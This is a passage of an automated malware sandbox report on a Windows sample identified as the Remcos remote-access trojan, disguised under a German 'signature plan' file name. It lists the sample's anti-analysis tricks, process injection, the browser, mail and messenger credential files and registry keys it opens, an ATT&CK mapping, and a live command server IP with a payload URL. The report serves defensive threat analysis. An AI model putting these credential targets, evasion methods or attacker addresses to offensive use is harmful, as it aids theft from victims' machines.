          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeWindow / User API: threadDelayed 5790Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe TID: 7824Thread sleep count: 3909 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe TID: 2264Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe TID: 2264Thread sleep count: 5790 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe TID: 2264Thread sleep time: -17370000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeThread sleep count: Count: 3909 delay: -5Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_36F710F1
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F76580 FindFirstFileExA,2_2_36F76580
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00418981 memset,GetSystemInfo,3_2_00418981
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI call chain: ExitProcess graph end nodegraph_0-2235
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI call chain: ExitProcess graph end nodegraph_0-2424
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI call chain: ExitProcess graph end nodegraph_4-34117
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_36F72639
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F74AB4 mov eax, dword ptr fs:[00000030h]2_2_36F74AB4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F7724E GetProcessHeap,2_2_36F7724E
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_36F72639
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_36F72B1C
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_36F760E2

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: NULL target: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: NULL target: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: NULL target: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo"Jump to behavior
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72933 cpuid 2_2_36F72933
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_36F72264
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,4_2_004082CD
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403350
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Tries to steal Instant Messenger accounts or passwords
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: ESMTPPassword4_2_004033F0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword4_2_00402DB3
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword4_2_00402DB3

          Remote Access Functionality

          barindex
          Detected Remcos RAT
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I617OKJump to behavior
          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		2
          Obfuscated Files or Information          		2
          Credentials in Registry          		1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		2
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
          Process Injection          		1
          Software Packing          		1
          Credentials In Files          		3
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Email Collection          		1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS128
          System Information Discovery          		Distributed Component Object Model2
          Clipboard Data          		1
          Remote Access Software          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets131
          Security Software Discovery          		SSHKeylogging2
          Non-Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Virtualization/Sandbox Evasion          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input Capture112
          Application Layer Protocol          		Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation          		DCSync4
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
          Process Injection          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520510 Sample: Nutzen_Unterschrift_Planen#... Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 25 geoplugin.net 2->25 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 5 other signatures 2->43 8 Nutzen_Unterschrift_Planen#2024.com.exe 2 37 2->8         started        signatures3 process4 file5 23 C:\Users\user\AppData\Local\...\System.dll, PE32 8->23 dropped 45 Detected unpacking (changes PE section rights) 8->45 47 Tries to steal Mail credentials (via file registry) 8->47 49 Switches to a custom stack to bypass stack traces 8->49 12 Nutzen_Unterschrift_Planen#2024.com.exe 3 14 8->12         started        signatures6 process7 dnsIp8 27 66.150.198.142, 2700, 49783, 49784 INTERNAP-BLOCK-4US United States 12->27 29 geoplugin.net 178.237.33.50, 49785, 80 ATOM86-ASATOM86NL Netherlands 12->29 51 Detected Remcos RAT 12->51 53 Maps a DLL or memory area into another process 12->53 16 Nutzen_Unterschrift_Planen#2024.com.exe 1 12->16         started        19 Nutzen_Unterschrift_Planen#2024.com.exe 1 12->19         started        21 Nutzen_Unterschrift_Planen#2024.com.exe 2 12->21         started        signatures9 process10 signatures11 31 Tries to steal Instant Messenger accounts or passwords 16->31 33 Tries to harvest and steal browser information (history, passwords, etc) 16->33 35 Tries to steal Mail credentials (via file / registry access) 19->35

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Nutzen_Unterschrift_Planen#2024.com.exe26%ReversingLabsWin32.Trojan.InjectorX
          Nutzen_Unterschrift_Planen#2024.com.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          geoplugin.net
          		178.237.33.50
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://geoplugin.net/json.gpfalse
              		unknown
              66.150.198.142true
                		unknown
                http://66.150.198.142/lOqpXUmQJccVjyn149.bintrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.google.comNutzen_Unterschrift_Planen#2024.com.exefalse
                    		unknown
                    http://www.imvu.comrNutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmpfalse
                      		unknown
                      https://www.msn.com/?ocid=iehpNutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.imvu.comNutzen_Unterschrift_Planen#2024.com.exefalse
                          		unknown
                          https://www.google.com/accounts/serviceloginNutzen_Unterschrift_Planen#2024.com.exefalse
                            		unknown
                            https://login.yahoo.com/config/loginNutzen_Unterschrift_Planen#2024.com.exefalse
                              		unknown
                              https://www.msn.com/de-ch/?ocid=iehpNutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://nsis.sf.net/NSIS_ErrorErrorNutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000000.316597134782.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                  		unknown
                                  http://www.nirsoft.net/Nutzen_Unterschrift_Planen#2024.com.exefalse
                                    		unknown
                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comNutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmpfalse
                                      		unknown
                                      http://www.ebuddy.comNutzen_Unterschrift_Planen#2024.com.exefalse
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        178.237.33.50
                                        		geoplugin.netNetherlands
                                        		8455ATOM86-ASATOM86NLfalse
                                        66.150.198.142
                                        		unknownUnited States
                                        		14742INTERNAP-BLOCK-4UStrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1520510
                                        Start date and time:2024-09-27 12:56:13 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 16m 55s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                        Run name:Suspected Instruction Hammering
                                        Number of analysed new started processes analysed:6
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Sample name:Nutzen_Unterschrift_Planen#2024.com.exe
                                        Detection:MAL
                                        Classification:mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 87%
                                        • Number of executed functions: 163
                                        • Number of non-executed functions: 331
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: Nutzen_Unterschrift_Planen#2024.com.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        06:59:20API Interceptor27684660x Sleep call for process: Nutzen_Unterschrift_Planen#2024.com.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        178.237.33.50SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        SecuriteInfo.com.Win32.Evo-gen.3521.549.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • geoplugin.net/json.gp
                                        6122.scr.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        6122.scr.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        file.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        geoplugin.netSERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Win32.Evo-gen.3521.549.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 178.237.33.50
                                        6122.scr.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        6122.scr.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ATOM86-ASATOM86NLSERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Win32.Evo-gen.3521.549.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 178.237.33.50
                                        6122.scr.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        6122.scr.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        INTERNAP-BLOCK-4USSecuriteInfo.com.Linux.Siggen.9999.14080.25460.elfGet hashmaliciousMiraiBrowse
                                        • 206.191.178.155
                                        KKveTTgaAAsecNNaaaa.mips.elfGet hashmaliciousUnknownBrowse
                                        • 74.217.127.187
                                        77.90.35.9-skid.x86-2024-07-30T07_10_50.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 69.25.66.63
                                        2sjlynRvU1.exeGet hashmaliciousGuLoaderBrowse
                                        • 66.150.198.176
                                        PaymentAdvice_JUL-30-BSSSG01-072024-000218.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 66.150.198.176
                                        PaymentAdvice_REMITTANCE-EUR37069-JUL-31-070224-000218.com.exeGet hashmaliciousRemcosBrowse
                                        • 66.150.198.176
                                        scan_doc20240628154931011588.com.exeGet hashmaliciousGuLoaderBrowse
                                        • 66.150.198.176
                                        94.156.79.133-mips-2024-07-01T19_26_38.elfGet hashmaliciousMirai, GafgytBrowse
                                        • 206.253.192.109
                                        g75NqH852l.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 66.151.233.246
                                        Q1xJlSm6Vl.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 75.98.44.199

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dllBenefit_Signature_Plan#3762.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          Benefit_Signature_Plan#3762.com.exeGet hashmaliciousGuLoaderBrowse
                                            DHL SHIPPING DOCUMENTS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              DHL SHIPPING DOCUMENTS.exeGet hashmaliciousGuLoaderBrowse
                                                Requesr for quotation-sample catalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  Requesr for quotation-sample catalog.vbsGet hashmaliciousGuLoaderBrowse
                                                    Zahteva za ponudbo #U2013 Katalog vzorcev.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      Zahteva za ponudbo #U2013 Katalog vzorcev.vbsGet hashmaliciousGuLoaderBrowse
                                                        SecuriteInfo.com.Win32.SuspectCrc.2428.21334.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\json[1].json

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
